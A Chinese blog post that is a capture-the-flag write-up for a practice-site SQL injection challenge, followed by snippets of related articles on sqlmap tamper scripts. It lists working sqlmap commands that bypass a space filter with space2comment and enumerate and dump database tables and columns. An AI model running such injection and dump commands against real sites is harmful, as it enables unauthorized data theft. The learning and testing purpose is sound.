实验吧 简单的SQL注入2攻击笔记

最新推荐文章于 2024-04-28 20:30:00 发布
最新推荐文章于 2024-04-28 20:30:00 发布
阅读量1.3k 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/JimGordonXu/article/details/78729137
版权

背景:使用kali linux中的sqlmap

1.在进入sqlmao的终端界面后输入    sqlmap -u http://ctf5.shiyanba.com/web/index_2.php?id=1 --tamper=space2comment --dbs

其中:1.sqlmap:启动sqlmap。2.-u:参数 指目标的URL。3.--tamper:绕过WAF脚本。4.space2comment :tamper脚本之一用于绕过过滤空格。5.--dbs列举数据库

红色括号中的information_schema数据库和test数据库是MySql数据库安装时自带的,所以我们要找的就是web1。

2.输入    sqlmap -u http://ctf5.shiyanba.com/web/index_2.php?id=1 --tamper=space2comment -D web1 --tables

其中:1.-D:后面跟数据库的名字。2.--tables:列举库中的表格


3. sqlmap -u http://ctf5.shiyanba.com/web/index_2.php?id=1 --tamper=space2comment -D web1 -T flag --column

其中:1.-T:后面跟表格名字。2.--column列举表格中的列名


4.sqlmap -u http://ctf5.shiyanba.com/web/index_2.php?id=1 --tamper=space2comment -D web1 -T flag -C  flag --dump

其中:1.-C后面跟列的名字。2.--dump取出表单所有记录。

结果就出来了

JimGordonXu
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqlmap绕过空格过滤方法
qq_45290991的博客
07-17 4890
sqlmap自带的脚本: --tamper "space2comment.py" 补充: 脚本名:space2comment.py 作用:Replaces space character ' ' with comments /**/ 也就是用注释/**/替换空格字符' ' sqlmap中的tamper脚本有很多,例如:equaltolike.py(作用是用like代替等号)、apostrophemask.py(作用是用utf8代替引号)、greatest.p...
B站kali前5章笔记.zip
03-14
这一章会介绍这些工具的基本用法,如何利用它们进行漏洞扫描、SQL注入、跨站脚本攻击等常见的Web安全问题检测。 总的来说,《B站Kali Linux前五章笔记》是一个全面而深入的入门教程,旨在帮助学习者快速掌握Kali ...
SQLMAP插件tamper模块介绍
永远是少年
08-25 1529
今天继续给大家介绍渗透测试相关知识,本文主要内容是SQLMAP插件tamper模块介绍。在SQLMAP中,有很多tamper插件,常用的tamper插件及其作用如下所示: **1、apostrophemast.py** 该脚本可以将payload中所有的引号替换成utf-8的格式 **2、base64encode.py** 该脚本可以将payload替换成Base64编码的格式。 **3、multiplespaces.py** 该脚本可以将payload中关
记一次某大学sql注入到getshell
渗透测试研究中心
01-19 261
0x01 前言目标是一大学,在一次挖洞过程中遇到个sql注入,尝试进一步利用扩大危害,漏洞已报送平台进行了修复0x02 sql注入getshell失败在id处连续加两个单引号都报错,经过探测发现是数字型的注入且过滤了空格,这里可以用/**/代替于是直接上sqlmappython sqlmap.py -u url --batch --tamper=space2comment.py –dbs 发现是...
网络安全 SQLmap-tamper的使用
最新发布
白帽子凯哥哥的博客
04-28 1341
SQLmap是一款强大的自动化SQL注入和数据库取证工具。它用于检测和利用SQL注入漏洞,帮助安全研究人员测试一个应用的数据库的安全性。
tamper绕WAF详解
weixin_34112208的博客
06-16 865
0x00 背景 sqlmap中的tamper脚本来对目标进行更高效的攻击。 由于乌云知识库少了sqlmap-tamper 收集一下,方便学习。 根据sqlmap中的tamper脚本可以学习过绕过一些技巧。 我收集在找相关的案例作为可分析什么环境使用什么tamper脚本。 小学生毕业的我,着能偷偷说一下多做一些收集对吸收知识很快。 0x01 start 脚本名:apostrophem...
SQL注入攻击实验报告
05-07
SQL注入攻击实验报告,自己写了试验的网站,举了一些基本的攻击和防御方法,有xp_cmdshell的执行,用的是sqlserver 2005
sqlmap脚本tamper使用
qq_43665434的博客
06-07 8523
很多时候还是得静下来分析过滤系统到底过滤了哪些参数,该如何绕过。 sqlmap中的tamper给我们带来了很多防过滤的脚本,非常实用,可能有的朋友还不知道怎样才能最有效的利用tamper脚本。 当然使用脚本之前需要确定的就是系统过滤了哪些关键字,比如单引号、空格、select、union、admin等等。 所以有的时候我们会发现,注入成功了但是dump不出数据,很可能是select被过滤了等等原因。 如何判断使用哪个脚本 最简单的办法就是在url参数中手工带入关键词,判断是否被过滤。 如图: 直接加个单引号
SQLMAP进阶使用 --tamper
Z_l123的博客
02-19 3473
实验原理 tamper脚本是SQLMAP中用于绕过waf或应对网站过滤逻辑的脚本。SQLMA自带了一些tamper脚本,可以在 tamper目录下查看它们。用户也可以根据已有的tamper脚本来编写自己的tamper脚本(绕过逻辑)。 1.查看Tamper文件 -->sqlmap->tamper,选中space2comment.py文件,并打开(记事本也可以) 这段代码为space2comment.py脚本文件的核心代码,其作用是将SQLMAP检测目标时所使用的payload..
渗透利器-sqlmap超级详解
kracer的博客
11-08 4483
目录 0X01 背景介绍 0X02 原理简述 0X03 参数说明 0X04 实战举例 0X05 高级用法 0X06 总结 0X01 背景介绍 官网:http://sqlmap.org 目前支持的数据库有:Altibase,Apache Derby, CrateDB, Cubrid, Firebird, FrontBase, H2, HSQLDB, IBM DB2, Informix, InterSystems Cache, Mckoi, Microsoft...
MySQL学习笔记.zip
02-23
此外,还应关注SQL注入攻击,通过预编译语句、参数化查询等方式防止此类安全问题。 十二、高级特性 MySQL还包括分区(Partitioning)、复制(Replication)、集群(Cluster)等高级特性,用于解决大数据量、高可用...
北大青鸟ASP..net教程第21课实验笔记
12-30
这里使用了SQL的`INSERT INTO`语句,但是采用了参数化查询的方式来防止SQL注入攻击。通过创建`SqlCommand`对象,设置SQL语句并添加参数。每个参数都是一个`SqlParameter`对象,设置其值、类型和大小。最后,执行`cmd...
个人学习Java安全的笔记.zip
11-02
8. **防止SQL注入**:Java开发者应了解如何安全地处理数据库查询,避免SQL注入攻击,可以使用PreparedStatement或参数化查询来实现。 9. **输入验证**:任何用户输入都应被视为不可信,因此需要进行严格的输入验证...
dvws:该死的易受攻击的Web服务是一个不安全的Web应用程序,具有多个易受攻击的Web服务组件,可用于了解现实世界中的Web服务漏洞。 笔记
05-06
REST API SQL注入 相同来源方法执行 JSON Web令牌(JWT)密钥暴力破解 跨域资源共享 指示 DVWS可以与XAMPP设置一起使用。 XAMPP是一个免费的开源跨平台Web服务器解决方案,主要由Apache Web Server和MySQL数据库组成...
Sqlmap使用详解
weixin_44110913的博客
07-29 3312
目录 Sqlmap Sqlmap的简单用法 探测指定URL是否存在SQL注入漏洞 查看数据库的所有用户(--users) 查看数据库所有用户名的密码(--passwords) 查看数据库当前用户(--current-user) 判断当前用户是否有管理权限(--is-dba 列出数据库管理员角色(--roles) 查看所有的数据库(--dbs) 查看当前的数据库(--current-db) 爆出指定数据库中的所有的表 爆...
sqlmap参数详解
十五年游戏主程转渗透之路
04-09 6948
sqlmap
sql注入简单实验 php,简单sql注入——实验
weixin_29070861的博客
03-22 314
我们输入1’ and ‘1’=’2,sql语句变为:select name from user where id='1' and '1'='2'这样查询条件为假,数据库不能读取数据。基于上述的方式进行注入,我们首先使用 1and 1=1如何 1 and 1=1'出现错误了,然后,我们再输入:1and 1=1就会发现and被过滤了并且空格被替换为+,因此我们可以推断,这个题过滤了常用的sql命令,可...
靶机渗透练习14-hackme2
hirak0的博客
04-15 1006
靶机描述 靶机地址:https://www.vulnhub.com/entry/hackme-2,618/ Description ‘hackme2’ is a medium difficulty level box. This is the second part of the hackme series where more controls are in place do deter malicious attacks. In addition, you will have to think ou
CTF-Web3-(SQL简单过滤绕过)
→_→
07-24 1617
3.简单sql注入 思路: 检测是否存在注入点的两种常用方法:(更多注入详情:Sqli-labs环境通关教程-学习) 1.基于报错的检测方法 一般这种方法是输入单引号’。看是否报错,如果数据库报错,说明后台数据库处理了我们输入的数据。那么有可能存在注 入点。 2.基于布尔的检测方法---(这只是最基础的判断) 这种方法是输入: 1 and 1=1 ,通常这种情况会正常返回数据 1 and 1=2 ,通常这种情况不会返回数据或者直接报错 或者 1' and '1'='1 ,通常这种.
sql注入教程:报错注入与二阶攻击策略
本篇自学笔记详细探讨了SQL注入中的一个重要技术手段——报错注入。报错注入利用的是Web应用程序中未关闭或过滤错误处理功能的情况,攻击者通过构造恶意SQL语句,迫使服务器在执行时返回错误信息,从而间接获取敏感...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值